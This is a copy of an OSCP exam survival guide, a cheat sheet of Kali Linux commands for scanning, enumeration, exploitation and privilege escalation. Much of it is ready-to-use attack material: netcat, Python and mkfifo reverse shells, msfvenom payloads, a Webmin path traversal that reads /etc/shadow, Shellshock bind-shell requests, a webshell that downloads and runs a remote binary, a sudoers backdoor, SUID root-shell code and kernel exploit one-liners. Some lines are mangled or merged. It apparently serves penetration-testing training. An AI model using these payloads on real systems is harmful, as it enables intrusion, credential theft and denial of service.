Kali Linux Offensive Security Certified Professional Survival Exam Guide
This is a clone of frizb/OSCP-Survival-Guide
This can also be viewed on x89k.tk
NOTE: This document refers to the target ip as the export variable $ip.
To set this value on the command line use the following syntax:
export ip=192.168.1.100
Set the Target IP Address to the
$ipsystem variable
export ip=192.168.1.100
Find the location of a file
locate sbd.exe
Search through directories in the
$PATHenvironment variable
which sbd
Find a search for a file that contains a specific string in it’s name:
find / -name sbd\*
Show active internet connections
netstat -lntp
Change Password
passwd
Verify a service is running and listening
netstat -antp |grep apache
Start a service
systemctl start ssh
systemctl start apache2
Have a service start at boot
systemctl enable ssh
Stop a service
systemctl stop ssh
Unzip a gz file
gunzip access.log.gz
Unzip a tar.gz file
tar -xzvf file.tar.gz
Search command history
history | grep phrase_to_search_for
Download a webpage
wget http://www.cisco.com
Open a webpage
curl http://www.cisco.com
String manipulation
wc -l index.html
Get the start or end of a file
head index.html
tail index.html
Extract all the lines that contain a string
grep "href=" index.html
Cut a string by a delimiter, filter results then sort
grep "href=" index.html | cut -d "/" -f 3 | grep "\\." | cut -d '"' -f 1 | sort -u
Using Grep and regular expressions and output to a file
cat index.html | grep -o 'http://\[^"\]\*' | cut -d "/" -f 3 | sort –u > list.txt
Use a bash loop to find the IP address behind each host
for url in $(cat list.txt); do host $url; done
Collect all the IP Addresses from a log file and sort by frequency
cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn
Decoding using Kali
Decode Base64 Encoded Values
echo -n "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" | base64 --decode
Decode Hexidecimal Encoded Values
echo -n "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874" | xxd -r -ps
Netcat - Read and write TCP and UDP Packets
nc -nv $ip 110
nc -nlvp 4444
nc -nv $ip 4444
nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe
nc -nlvp 4444 > incoming.exe
Some OSs (OpenBSD) will use nc.traditional rather than nc so watch out for that...
whereis nc nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz/bin/nc.traditional -e /bin/bash 1.2.3.4 4444
Create a reverse shell with Ncat using cmd.exe on Windows
nc.exe -nlvp 4444 -e cmd.exe
or
nc.exe -nv -e cmd.exe
Create a reverse shell with Ncat using bash on Linux
nc -nv $ip 4444 -e /bin/bash
Netcat for Banner Grabbing:
echo "" | nc -nv -w1
Ncat - Netcat for Nmap project which provides more security avoid IDS
ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl
ncat -v $ip 4444 --ssl
Wireshark
Show only SMTP (port 25) and ICMP traffic:
tcp.port eq 25 or icmp
Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet:
ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs:
ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip
Some commands are equal
ip.addr == xxx.xxx.xxx.xxx
Equals
ip.src == xxx.xxx.xxx.xxx or ip.dst == xxx.xxx.xxx.xxx
ip.addr != xxx.xxx.xxx.xxx
Equals
ip.src != xxx.xxx.xxx.xxx or ip.dst != xxx.xxx.xxx.xxx
Tcpdump
tcpdump -r passwordz.pcap
tcpdump -n -r passwordz.pcap | awk -F" " '{print $3}' | sort -u | head
tcpdump tcp port 80 -w output.pcap -i eth0
tcpdump -A -n 'tcp[13] = 24' -r passwordz.pcap
Dsniff
dsniff -p ch2.pcap
IPTables
Deny traffic to ports except for Local Loopback
iptables -A INPUT -p tcp --destination-port 13327 ! -d $ip -j DROP
iptables -A INPUT -p tcp --destination-port 9991 ! -d $ip -j DROP
Clear ALL IPTables firewall rules
```bash iptables -P INPUT ACCEPT iptables -P FORWARD ACCEPT iptables -P OUTPUT ACCEPT iptables -t nat -F iptables -t mangle -F iptables -F iptables -X iptables -t raw -F iptables -t raw -X ```
Google Hacking
site:microsoft.com
intitle:"netbotz appliance" "OK" -filetype:pdf
inurl:"level/15/sexec/-/show"
SSL Certificate Testing
https://www.ssllabs.com/ssltest/analyze.html
Email Harvesting
Simply Email
git clone https://github.com/killswitch-GUI/SimplyEmail.git
./SimplyEmail.py -all -e TARGET-DOMAIN
LDAP
ldapsearch -x -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" -H "ldap://challenge01.root-me.org:54013"
Netcraft
Whois Enumeration
whois domain-name-here.com
whois $ip
Banner Grabbing
nc -v $ip 25
telnet $ip 25
nc TARGET-IP 80
Recon-ng - full-featured web reconnaissance framework written in Python
cd /opt; git clone https://[email protected]/LaNMaSteR53/recon-ng.git
cd /opt/recon-ng
./recon-ng
show modules
help
Subnet Reference Table
/ | Addresses | Hosts | Netmask | Amount of a Class C |
---|---|---|---|---|
/30 | 4 | 2 | 255.255.255.252 | 1/64 |
/29 | 8 | 6 | 255.255.255.248 | 1/32 |
/28 | 16 | 14 | 255.255.255.240 | 1/16 |
/27 | 32 | 30 | 255.255.255.224 | 1/8 |
/26 | 64 | 62 | 255.255.255.192 | 1/4 |
/25 | 128 | 126 | 255.255.255.128 | 1/2 |
/24 | 256 | 254 | 255.255.255.0 | 1 |
/23 | 512 | 510 | 255.255.254.0 | 2 |
/22 | 1024 | 1022 | 255.255.252.0 | 4 |
/21 | 2048 | 2046 | 255.255.248.0 | 8 |
/20 | 4096 | 4094 | 255.255.240.0 | 16 |
/19 | 8192 | 8190 | 255.255.224.0 | 32 |
/18 | 16384 | 16382 | 255.255.192.0 | 64 |
/17 | 32768 | 32766 | 255.255.128.0 | 128 |
/16 | 65536 | 65534 | 255.255.0.0 | 256 |
Set the ip address as a variable
export ip=192.168.1.100
nmap -A -T4 -p- $ip
Netcat port Scanning
nc -nvv -w 1 -z $ip 3388-3390
Discover active IPs usign ARP on the network:
arp-scan $ip/24
Discover who else is on the network
netdiscover
Discover IP Mac and Mac vendors from ARP
netdiscover -r $ip/24
Nmap stealth scan using SYN
nmap -sS $ip
Nmap stealth scan using FIN
nmap -sF $ip
Nmap Banner Grabbing
nmap -sV -sT $ip
Nmap OS Fingerprinting
nmap -O $ip
Nmap Regular Scan:
nmap $ip/24
Enumeration Scan
nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt
Enumeration Scan All Ports TCP / UDP and output to a txt file
nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip
Nmap output to a file:
nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24
Quick Scan:
nmap -T4 -F $ip/24
Quick Scan Plus:
nmap -sV -T4 -O -F --version-light $ip/24
Quick traceroute
nmap -sn --traceroute $ip
All TCP and UDP Ports
nmap -v -sU -sS -p- -A -T4 $ip
Intense Scan:
nmap -T4 -A -v $ip
Intense Scan Plus UDP
nmap -sS -sU -T4 -A -v $ip/24
Intense Scan ALL TCP Ports
nmap -p 1-65535 -T4 -A -v $ip/24
Intense Scan - No Ping
nmap -T4 -A -v -Pn $ip/24
Ping scan
nmap -sn $ip/24
Slow Comprehensive Scan
nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24
Scan with Active connect in order to weed out any spoofed ports designed to troll you
nmap -p1-65535 -A -T5 -sT $ip
DNS Enumeration
nmap -F --dns-server
host -t ns megacorpone.com
for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"
dig a domain-name-here.com @nameserver
dig mx domain-name-here.com @nameserver
dig axfr domain-name-here.com @nameserver
DNS Zone Transfers
Windows DNS zone transfer
nslookup -> set type=any -> ls -d blah.com
Linux DNS zone transfer
dig axfr blah.com @ns1.blah.com
Dnsrecon DNS Brute Force
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
Dnsrecon DNS List of megacorp
dnsrecon -d megacorpone.com -t axfr
DNSEnum
dnsenum zonetransfer.me
NMap Enumeration Script List:
nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p
NFS (Network File System) Enumeration
nmap -sV --script=nfs-showmount $ip
RPC (Remote Procedure Call) Enumeration
rpcclient --user="" --command=enumprivs -N $ip
rpcclient --user="" --command=enumprivs $ip
SMB Enumeration
nmap $ip --script smb-os-discovery.nse
nmap -v -p 139,445 -oG smb.txt $ip-254
nbtscan -r $ip/24
nmap -sU --script nbstat.nse -p 137 $ip
Nmap all SMB scripts scan
nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip
Nmap all SMB scripts authenticated scan
nmap -sV -Pn -vv -p 445 --script-args smbuser=,smbpass= --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip
SMB Enumeration Tools
nmblookup -A $ip
smbclient //MOUNT/share -I $ip -N
rpcclient -U "" $ip
enum4linux $ip
enum4linux -a $ip
SMB Finger Printing
smbclient -L //$ip
Nmap Scan for Open SMB Shares
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.10.0/24
Nmap scans for vulnerable SMB Servers
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip
Nmap List all SMB scripts installed
ls -l /usr/share/nmap/scripts/smb*
Enumerate SMB Users
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14
OR
python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip
RID Cycling - Null Sessions
ridenum.py $ip 500 50000 dict.txt
Manual Null Session Testing
Windows:
net use \\$ip\IPC$ "" /u:""
Linux:
smbclient -L //$ip
SMTP Enumeration - Mail Severs
nc -nv $ip 25
POP3 Enumeration - Reading other peoples mail - You may find usernames and passwords for email accounts, so here is how to check the mail using Telnet
[email protected]:~# telnet $ip 110 +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready USER billydean +OK PASS password +OK Welcome billydeanlist
+OK 2 1807 1 786 2 1021
retr 1
+OK Message follows From: [email protected] Dear Billy Dean,
Here is your login for remote desktop ... try not to forget it this time! username: billydean password: PA$$W0RD!Z
SNMP Enumeration -Simple Network Management Protocol
apt-get install snmp-mibs-downloader download-mibs
echo "" > /etc/snmp/snmp.conf
SNMP Enumeration Commands
snmpcheck -t $ip -c public
snmpwalk -c public -v1 $ip 1|
grep hrSWRunName|cut -d\* \* -f
snmpenum -t $ip
onesixtyone -c names -i hosts
SNMPv3 Enumeration
nmap -sV -p 161 --script=snmp-info $ip/24
Automate the username enumeration process for SNMPv3:
apt-get install snmp snmp-mibs-downloader
wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb
SNMP Default Credentials
/usr/share/metasploit-framework/data/wordlists/snmpdefaultpass.txt
MS SQL Server Enumeration
Nmap Information Gathering
nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip
Webmin and miniserv/0.01 Enumeration - Port 10000
Test for LFI & file disclosure vulnerability by grabbing /etc/passwd
`curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd`
Test to see if webmin is running as root by grabbing /etc/shadow
`curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow`
Linux OS Enumeration
find / -perm -4000 2>/dev/null
cat /etc/issue
uname -a
ps -xaf
sudo -l
iptables --table nat --list iptables -vL -t filter iptables -vL -t nat iptables -vL -t mangle iptables -vL -t raw iptables -vL -t security
Windows OS Enumeration
Vulnerability Scanning with Nmap
Nmap Exploit Scripts
https://nmap.org/nsedoc/categories/exploit.html
Nmap search through vulnerability scripts
cd /usr/share/nmap/scripts/ ls -l \*vuln\*
Nmap search through Nmap Scripts for a specific keyword
ls /usr/share/nmap/scripts/\* | grep ftp
Scan for vulnerable exploits with nmap
nmap --script exploit -Pn $ip
NMap Auth Scripts
https://nmap.org/nsedoc/categories/auth.html
Nmap Vuln Scanning
https://nmap.org/nsedoc/categories/vuln.html
NMap DOS Scanning
nmap --script dos -Pn $ip NMap Execute DOS Attack nmap --max-parallelism 750 -Pn --script http-slowloris --script-args http-slowloris.runforever=true
Scan for coldfusion web vulnerabilities
nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip
Anonymous FTP dump with Nmap
nmap -v -p 21 --script=ftp-anon.nse $ip-254
SMB Security mode scan with Nmap
nmap -v -p 21 --script=ftp-anon.nse $ip-254
File Enumeration
/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null
wget https://highon.coffee/downloads/linux-local-enum.sh
chmod +x ./linux-local-enum.sh
./linux-local-enum.sh
find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug
find /. -name suid\*
strings
file
gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip
Dirb - Directory brute force finding using a dictionary file
dirb http://$ip/ wordlist.dict
dirb
Dirb against a proxy
dirb [http://$ip/](http://172.16.0.19/) -p $ip:3129
Nikto
nikto -h $ip
HTTP Enumeration with NMAP
nmap --script=http-enum -p80 -n $ip/24
Nmap Check the server methods
nmap --script http-methods --script-args http-methods.url-path='/test' $ip
Get Options available from web server
curl -vX OPTIONS vm/test
Uniscan directory finder:
uniscan -qweds -u
Wfuzz - The web brute forcer
wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test
wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"
wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ
Recurse level 3
wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ
Open a service using a port knock (Secured with Knockd)
for x in 7000 8000 9000; do nmap -Pn --hosttimeout 201 --max-retries 0 -p $x serverip_address; done
WordPress Scan - Wordpress security scanner
RSH Enumeration - Unencrypted file transfer system
Finger Enumeration
TLS & SSL Testing
Proxy Enumeration (useful for open proxies)
Steganography
apt-get install steghide
steghide extract -sf picture.jpg
steghide info picture.jpg
apt-get install stegosuite
The OpenVAS Vulnerability Scanner
DEP and ASLR - Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR)
Nmap Fuzzers:
MSFvenom
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
Windows Buffer Overflows
Controlling EIP
locate pattern_create pattern_create.rb -l 2700 locate pattern_offset pattern_offset.rb -q 39694438
Verify exact location of EIP - [*] Exact match at offset 2606
buffer = "A" \* 2606 + "B" \* 4 + "C" \* 90
Check for “Bad Characters” - Run multiple times 0x00 - 0xFF
Use Mona to determine a module that is unprotected
Bypass DEP if present by finding a Memory Location with Read and Execute access for JMP ESP
Use NASM to determine the HEX code for a JMP ESP instruction
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rbJMP ESP
00000000 FFE4 jmp esp
Run Mona in immunity log window to find (FFE4) XEF command
!mona find -s "\xff\xe4" -m slmfc.dll found at 0x5f4a358f - Flip around for little endian format buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390
MSFVenom to create payload
msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"
Final Payload with NOP slide
buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
Create a PE Reverse Shell
msfvenom -p windows/shellreversetcp LHOST=$ip LPORT=4444 -f
exe -o shell_reverse.exe
Create a PE Reverse Shell and Encode 9 times with Shikataganai
msfvenom -p windows/shellreversetcp LHOST=$ip LPORT=4444 -f
exe -e x86/shikataganai -i 9 -o shellreversemsf_encoded.exe
Create a PE reverse shell and embed it into an existing executable
msfvenom -p windows/shellreversetcp LHOST=$ip LPORT=4444 -f exe -e x86/shikataganai -i 9 -x /usr/share/windows-binaries/plink.exe -o shellreversemsfencodedembedded.exe
Create a PE Reverse HTTPS shell
msfvenom -p windows/meterpreter/reversehttps LHOST=$ip LPORT=443 -f exe -o methttps_reverse.exe
Linux Buffer Overflows
Netcat Shell Listener
nc -nlvp 4444
Spawning a TTY Shell - Break out of Jail or limited shell You should almost always upgrade your shell after taking control of an apache or www user.
(For example when you encounter an error message when trying to run an exploit sh: no job control in this shell )(hint: sudo -l to see what you can run)
You may encounter limited shells that use rbash and only allow you to execute a single command per session. You can overcome this by executing an SSH shell to your localhost:
ssh [email protected]$ip nc $localip 4444 -e /bin/sh enter user's password python -c 'import pty; pty.spawn("/bin/sh")' export TERM=linux
python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"\]);'
echo os.system('/bin/bash')
/bin/sh -i
perl —e 'exec "/bin/sh";'
perl:
exec "/bin/sh";
ruby:
exec "/bin/sh"
lua:
os.execute('/bin/sh')
From within IRB:
exec "/bin/sh"
From within vi:
:!bashor
:set shell=/bin/bash:shell
From within vim
':!bash':
From within nmap:
!sh
From within tcpdump
echo $’id\\n/bin/netcat $ip 443 –e /bin/bash’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst –Z root
From busybox
/bin/busybox telnetd -|/bin/sh -p9999
Pen test monkey PHP reverse shell
http://pentestmonkey.net/tools/web-shells/php-reverse-shel
php-findsock-shell - turns PHP port 80 into an interactive shell
http://pentestmonkey.net/tools/web-shells/php-findsock-shell
Perl Reverse Shell
http://pentestmonkey.net/tools/web-shells/perl-reverse-shell
PHP powered web browser Shell b374k with file upload etc.
https://github.com/b374k/b374k
Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shellhttps://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
Web Backdoors from Fuzzdb https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors
Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php
OR
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
Then we need to add the <?php at the first line of the file so that it will execute as a PHP webpage:
cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
Handlers Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler set PAYLOAD set LHOST set LPORT set ExitOnSession false exploit -j -z
Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
SSH to Meterpreter: https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/
use auxiliary/scanner/ssh/ssh_login use post/multi/manage/shell_to_meterpreter
SBD.exe
sbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. sbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. sbd supports TCP/IP communication only. sbd.exe (part of the Kali linux distribution: /usr/share/windows-binaries/backdoors/sbd.exe) can be uploaded to a windows box as a Netcat alternative.
Shellshock
[email protected]:~/Documents# nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi $ip* git clone https://github.com/nccgroup/shocker
./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose* Shell Shock SSH Forced Command
ssh -vvv ssh -i noob [email protected]$ip '() { :;}; /bin/bash'
cat file (view file contents)
echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; echo \\$(
Shell Shock run bind shell
echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; /usr/bin/nc -l -p 9999 -e /bin/sh\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80
Post exploitation refers to the actions performed by an attacker, once some level of control has been gained on his target.
Simple Local Web Servers
Creating a wget VB Script on Windows:
https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt
Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line):
echo Set args = Wscript.Arguments >> webdl.vbs timeout 1 echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs timeout 1 echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs timeout 1 echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs timeout 1 echo xHttp.Open "GET", Url, False >> webdl.vbs timeout 1 echo xHttp.Send >> webdl.vbs timeout 1 echo with bStrm >> webdl.vbs timeout 1 echo .type = 1 ' >> webdl.vbs timeout 1 echo .open >> webdl.vbs timeout 1 echo .write xHttp.responseBody >> webdl.vbs timeout 1 echo .savetofile "C:\temp\windows-privesc-check2.exe", 2 ' >> webdl.vbs timeout 1 echo end with >> webdl.vbs timeout 1 echo
The file can be run using the following syntax:
C:\temp\cscript.exe webdl.vbs
Mounting File Shares
HTTP Put
nmap -p80 $ip --script http-put --script-args http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php
SCP
scp [email protected]host:directory1/filename1 [email protected]host:directory2/filename2
scp localfile [email protected]$ip:~/Folder/
scp LinuxExploitSuggester.pl [email protected]:~
Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor
davtest -move -sendbd auto -url http://$ip
https://github.com/cldrn/davtest
You can also upload a file using the PUT method with the curl command:
curl -T 'leetshellz.txt' 'http://$ip'
And rename it to an executable file using the MOVE method with the curl command:
curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'
Upload shell using limited php shell cmd
use the webshell to download and execute the meterpreter
[curl -s --data "cmd=wget http://174.0.42.42:8000/dhn -O /tmp/evil" http://$ip/files/sh.php
[curl -s --data "cmd=chmod 777 /tmp/evil" http://$ip/files/sh.php
curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php
TFTP
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /usr/share/windows-binaries/nc.exe /tftp/
EX. FROM WINDOWS HOST:
C:\Users\Offsec>tftp -i $ip get nc.exe
FTP
apt-get update && apt-get install pure-ftpd
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
Password reuse is your friend. The OSCP labs are true to life, in the way that the users will reuse passwords across different services and even different boxes. Maintain a list of cracked passwords and test them on new machines you encounter.
Defacto Linux Privilege Escalation Guide - A much more through guide for linux enumeration:https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Try the obvious - Maybe the user is root or can sudo to root:
id
sudo su
Here are the commands I have learned to use to perform linux enumeration and privledge escalation:
What users can login to this box (Do they use thier username as thier password)?:
grep -vE "nologin|false" /etc/passwd
What kernel version are we using? Do we have any kernel exploits for this version?
uname -a
searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"
What applications have active connections?:
netstat -tulpn
What services are running as root?:
ps aux | grep root
What files run as root / SUID / GUID?:
find / -perm +2000 -user root -type f -print find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here. find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it. find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it. find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
What folders are world writeable?:
find / -writable -type d 2>/dev/null # world-writeable folders find / -perm -222 -type d 2>/dev/null # world-writeable folders find / -perm -o w -type d 2>/dev/null # world-writeable folders find / -perm -o x -type d 2>/dev/null # world-executable folders find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders
There are a few scripts that can automate the linux enumeration process:
LinuxPrivChecker.py - My favorite automated linux priv enumeration checker -
LinEnum - (Recently Updated)
https://github.com/rebootuser/LinEnum * linux-exploit-suggester (Recently Updated)
https://github.com/mzet-/linux-exploit-suggester * Highon.coffee Linux Local Enum - Great enumeration script!
`wget https://highon.coffee/downloads/linux-local-enum.sh`
https://github.com/PenturaLabs/LinuxExploitSuggester * Linux post exploitation enumeration and exploit checking tools
Handy Kernel Exploits
CVE-2010-2959 - 'CAN BCM' Privilege Escalation - Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32)
https://www.exploit-db.com/exploits/14814/
wget -O i-can-haz-modharden.c http://www.exploit-db.com/download/14814 $ gcc i-can-haz-modharden.c -o i-can-haz-modharden $ ./i-can-haz-modharden [+] launching root shell! # id uid=0(root) gid=0(root)
CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
https://www.exploit-db.com/exploits/15285/
CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
https://git.zx2c4.com/CVE-2012-0056/about/
Linux CVE 2012-0056
wget -O exploit.c http://www.exploit-db.com/download/18411 gcc -o mempodipper exploit.c ./mempodipper
CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
https://dirtycow.ninja/
First existed on 2.6.22 (released in 2007) and was fixed on Oct 18, 2016
Run a command as a user other than root
sudo -u haxzor /usr/bin/vim /etc/apache2/sites-available/000-default.conf
Add a user or change a password
/usr/sbin/useradd -p 'openssl passwd -1 thePassword' haxzor echo thePassword | passwd haxzor --stdin
Local Privilege Escalation Exploit in Linux
SUID (Set owner User ID up on execution)
Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.
below are some quick copy and paste examples for various shells:
SUID C Shell for /bin/bashint main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}SUID C Shell for /bin/sh
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}Building the SUID Shell binary
gcc -o suid suid.c
For 32 bit:
gcc -m32 -o suid suid.c
Create and compile an SUID from a limited shell (no file transfer)
echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem(\"/bin/sh\");\n}" >privsc.c gcc privsc.c -o privsc
Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement:
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
You may find a command is being executed by the root user, you may be able to modify the system PATH environment variable to execute your command instead. In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on port 4444.
set PATH="/tmp:/usr/local/bin:/usr/bin:/bin" echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh chmod +x ssh
SearchSploit
searchsploit –uncsearchsploit apache 2.2 searchsploit "Linux Kernel" searchsploit linux 2.6 | grep -i ubuntu | grep local searchsploit slmail
Kernel Exploit Suggestions for Kernel Version 3.0.0
